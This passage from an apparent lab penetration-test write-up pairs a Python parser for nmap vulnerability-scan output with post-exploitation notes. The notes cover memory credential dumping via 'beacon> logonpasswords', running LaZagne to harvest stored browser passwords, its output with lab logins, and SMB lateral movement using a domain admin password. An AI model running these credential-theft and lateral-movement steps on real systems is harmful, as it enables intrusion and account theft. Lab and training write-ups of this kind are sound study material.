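| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
Nmap done: 1 IP address (1 host up) scanned in 125.97 seconds
"""

REPORT_RE = re.compile(r"^Nmap scan report for (?:(\S+) \()?(\d+(?:\.\d+){3})\)?")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)")
# A block starts with a lowercase NSE script name; the lookahead keeps "https://..." from matching.
SCRIPT_RE = re.compile(r"^\|_?\s*([a-z][a-z0-9-]*):(?!//)\s*(.*)$")
STATE_RE = re.compile(r"\bState:\s*(.+?)\s*$")
RISK_RE = re.compile(r"\bRisk factor:\s*(\S+)")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")
NOISE_PREFIXES = ("beacon>", "[*]", "[+]")


@dataclass
class ScriptResult:
    name: str
    scope: str  # "host" or "<port>/<proto>"
    inline: str  # value on the script's own line, e.g. "false" or an ERROR message
    state: Optional[str] = None
    risk: Optional[str] = None
    cves: List[str] = field(default_factory=list)

    def is_vulnerable(self) -> bool:
        # Covers "VULNERABLE", "VULNERABLE (Exploitable)" and "LIKELY VULNERABLE".
        return self.state is not None and "VULNERABLE" in self.state.upper()


@dataclass
class HostReport:
    ip: str
    hostname: Optional[str]
    ports: List[Tuple[str, str, str]] = field(default_factory=list)  # (port, proto, service)
    scripts: List[ScriptResult] = field(default_factory=list)

    def vulnerable(self) -> List[ScriptResult]:
        return [s for s in self.scripts if s.is_vulnerable()]


def parse_nmap_vuln_output(text: str) -> List[HostReport]:
    """Turn pasted `nmap --script=vuln` console output into per-host structured findings."""
    reports: List[HostReport] = []
    current: Optional[HostReport] = None
    scope, script = "host", None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(NOISE_PREFIXES):
            continue
        if m := REPORT_RE.match(line):
            current = HostReport(ip=m.group(2), hostname=m.group(1))
            reports.append(current)
            scope, script = "host", None
        elif current is None:
            continue
        elif m := PORT_RE.match(line):
            current.ports.append((m.group(1), m.group(2), m.group(3)))
            scope, script = f"{m.group(1)}/{m.group(2)}", None
        elif not line.startswith("|"):
            script = None  # "Host script results:", "Nmap done", ...: any open block ends
            if line.startswith("Host script results"):
                scope = "host"
        elif m := SCRIPT_RE.match(line):
            script = ScriptResult(name=m.group(1), scope=scope, inline=m.group(2))
            current.scripts.append(script)
        elif script is not None:
            body = line.lstrip("|_ ")
            if m := STATE_RE.search(body):
                script.state = m.group(1)
            if m := RISK_RE.search(body):
                script.risk = m.group(1)
            script.cves += [c for c in CVE_RE.findall(body) if c not in script.cves]
    return reports
```

Run against the full output of all three hosts above, parse_nmap_vuln_output yields one HostReport per scan, and host.vulnerable() is the list to hand to whoever owns patching: for this lab that is MS08-067 on .141 and MS17-010 plus the DoublePulsar implant on all three, the latter being an indicator of an existing compromise rather than a missing patch. Scripts that only say false or NT_STATUS_ACCESS_DENIED keep their inline value so a reviewer can tell "not vulnerable" from "could not check".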
Domain information gathering
What is this? Garbage
Collecting account passwords
Dumping system passwords directly from memory
beacon> logonpasswords
Using LaZagne to find all locally stored passwords
LaZagne download address: https://github.com/AlessandroZ/LaZagne/releases/
Upload the exe to the target host with 蚁剑 and then run it. Possibly again because of the machine, the all command does not work properly, but the other commands work fine
C:\phpStudy> lazagne.exe all
C:\phpStudy> lazagne.exe browsers
|====================================================================|
| |
| The LaZagne Project |
| |
| ! BANG BANG ! |
| |
|====================================================================|
[+] System masterkey decrypted for f22e410f-f947-4e08-8f2a-8f65df603f8d
[+] System masterkey decrypted for 1e582198-061f-43f1-abdf-d4e9b606b035
[+] System masterkey decrypted for bac7c6bc-5481-420b-b563-762266ca9865
########## User: Administrator ##########
------------------- Firefox passwords -----------------
[+] Password found !!!
URL: http://192.168.101.12:8080
Login: info@test.lab
Password: 123456789
########## User: liukaifeng01 ##########
------------------- Firefox passwords -----------------
[+] Password found !!!
URL: http://192.168.101.12:8080
Login: info@test.lab
Password: 123456789
[+] 2 passwords have been found.
For more information launch it again with the -v option
elapsed time = 8.12800002098
Logging in to other hosts with the domain account
Building a tunnel
Since the other hosts are on VM1, SMB is used to establish the connection
target
The system passwords were obtained earlier, so log in directly with the domain administrator's password
Take the intranet machines 138 and 141 the same way
Results topology
Alright, that's the end.